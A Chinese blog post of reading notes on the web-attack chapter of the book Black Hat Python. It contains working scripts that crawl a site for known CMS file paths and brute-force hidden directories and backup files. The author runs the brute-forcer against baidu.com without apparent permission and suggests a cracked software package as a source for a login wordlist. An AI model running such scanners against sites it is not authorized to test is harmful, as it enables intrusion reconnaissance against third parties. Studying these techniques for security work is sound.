读书笔记 -《Python 黑帽子》 ( 四 )

最新推荐文章于 2022-10-29 09:28:13 发布

羊指甲

最新推荐文章于 2022-10-29 09:28:13 发布

阅读量2.2k

点赞数 1

CC 4.0 BY-SA版权

分类专栏： python 网络

本文链接：https://blog.youkuaiyun.com/zhijiayang/article/details/50689993

网络同时被 2 个专栏收录

15 篇文章

订阅专栏

python

11 篇文章

订阅专栏

本文深入探讨了使用Python库urllib2进行Web攻击的方法，包括如何爬取开源网站的所有文件、暴力破解目录及文件位置，以及破解HTML表单认证的技术。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

读书笔记系列文章

一直都在读书，读了忘，忘了再读。不如把每次学到的东西都写下来

第五章 Web 攻击

Web 的套接字函数库： urllib2

第二章的明星： Paramiko
第三章的明星： socket
第四章的明星： Scapy
第五章的明星： urllib2
这一节就看看这个 urllib2 库
urllib2库是一个非常要用的 http 客户端库，使用该库做 url 请求的时候，可以设置代理、超时时间、header、Redirect、Cookie、使用 HTTP 的 PUT 和 DELETE 方法、得到 HTTP 的返回码、解析表单等等等等，功能不可谓强大。
作者在这一节介绍了基本的使用方法，用 urllib2访问网页


import urllib2

url = 'http://www.baidu.com'

headers = {}
headers['User-Agent'] = 'Googlebot'

request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)

print response.geturl()
print response.read()
response.close()

开源 Web 应用安装

这一节的目的是爬取一个使用开源框架的网站的所有文件。
为什么攻击对象是开源网站？
原因很简单，攻击者可以在本地使用相同的框架创建一个模拟的网站，这样攻击者就能了解网站文件目录的层次结构，然后按照这个结构，去爬取指定网站的文件。

这一节的代码，作者强调了一个地方，就是使用了 Queue。写多线程的人基本都会用这个东西，因为线程安全。这一节作者用 Queue 来存储要爬取的 url，然后开启多线程，每个线程都是从 Queue 里面拿 url，然后干活。

说到开源框架，作者提到了 Joomla, WordPress, Drupal，但是为什么没提到 Django， Ghost。要想实验这一节的代码，起码得安装其中的一个，我只安装了 Ghost，还没测试。
代码如下

import Queue
import threading
import os
import urllib2

threads = 10

target = "http://www.test.com"
directory = "/Users/justin/Downloads/joomla-3.1.1"
filters = [".jpg", ".gif", "png", ".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r, d, f in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r, files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)


def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

            print "[%d] => %s" % (response.code, path)

            response.close()

        except urllib2.HTTPError as error:
            # print "Failed %s" % error.code
            pass


for i in range(threads):
    print "Spawning thread: %d" % i
    t = threading.Thread(target=test_remote)
    t.start()

暴力破解目录和文件位置

暴力破解其实就是在不知道任何消息的情况下，使用遍历字典的方式，挨个的式，反正有时间。
这些字典可以找开源项目下载。作者提供了两个，DirBuster 和 SVNDigger，还有下一章要介绍的web 进攻神器 Burp Suite。
https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
这一节，作者利用 SVNDigger 提供的字典，来对目标网站进行暴力扫描下载，从上面的网址下载 all.txt文件作为字典。
这一段代码我试了一下，把攻击网站改为 baidu

import urllib2
import urllib
import threading
import Queue

threads = 5
target_url = "http://www.baidu.com"
wordlist_file = "all.txt"  # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"


def build_wordlist(wordlist_file):
    # read in the word list
    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume

        else:
            words.put(word)

    return words


def dir_bruter(extensions=None):
    while not word_queue.empty():
        attempt = word_queue.get()

        attempt_list = []

        # check if there is a file extension if not
        # it's a directory path we're bruting
        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        # if we want to bruteforce extensions
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

        # iterate over our list of attempts        
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))

            try:
                headers = {}
                headers["User-Agent"] = user_agent
                r = urllib2.Request(url, headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):
                    print "[%d] => %s" % (response.code, url)

            except urllib2.HTTPError, e:

                if e.code != 404:
                    print "!!! %d => %s" % (e.code, url)

                pass


word_queue = build_wordlist(wordlist_file)
extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(extensions,))
    t.start()

运行结果，竟然每个网址都有。原来百度对于不存在的网址返回的不是4xx，而是一个3XX 的跳转，urllib2自动下载了这个跳转后的网页，这个跳转后的网页是百度的一个错误提示网页，对于代码来说，跟正常网页一样，所以输出的状态码是200。所以这个攻击代码需要改一改，需要判断一下 response 的 url 和我们指定的 url 是不是一样，幸好 urllib2提供了这样的功能。在原来的代码里面加入这么一句判断就行了 if response.geturl() == url:


[200] => http://www.baidu.com/root/
[200] => http://www.baidu.com/CVS/
[200] => http://www.baidu.com/common/
[200] => http://www.baidu.com/Entries/
[200] => http://www.baidu.com/lang/
[200] => http://www.baidu.com/root.php
[200] => http://www.baidu.com/Entries.php

$ curl http://www.baidu.com/root/ -i
HTTP/1.1 302 Found
Via: 1.1 TMG3
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Content-Length: 222
Expires: Sat, 20 Feb 2016 02:33:59 GMT
Date: Fri, 19 Feb 2016 02:33:59 GMT
Location: http://www.baidu.com/search/error.html
Content-Type: text/html; charset=iso-8859-1
Server: Apache
Cache-Control: max-age=86400

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.baidu.com/search/error.html">here</a>.</p>
</body></html>

暴力破解 html 表格认证

这一节作者分析了 Joomla 的登录 html，然后用 urllib2和 HTMLParser进行暴力破解，由于字典文件暂时还没有下载下来，也没有安装 Joomla, 回头再试试这个代码。
字典文件从 http://www.oxid.it/cain.html 下载，等网络条件好一点再下载。
Joomlak看起来还不错，回家后试一试
没翻墙，先下载一个破解后的绿色包（http://www.wmzhe.com/soft-18663.html），在里面找到了 wordlist.txt文件，估计就是这个了。
这里留一个 # TODO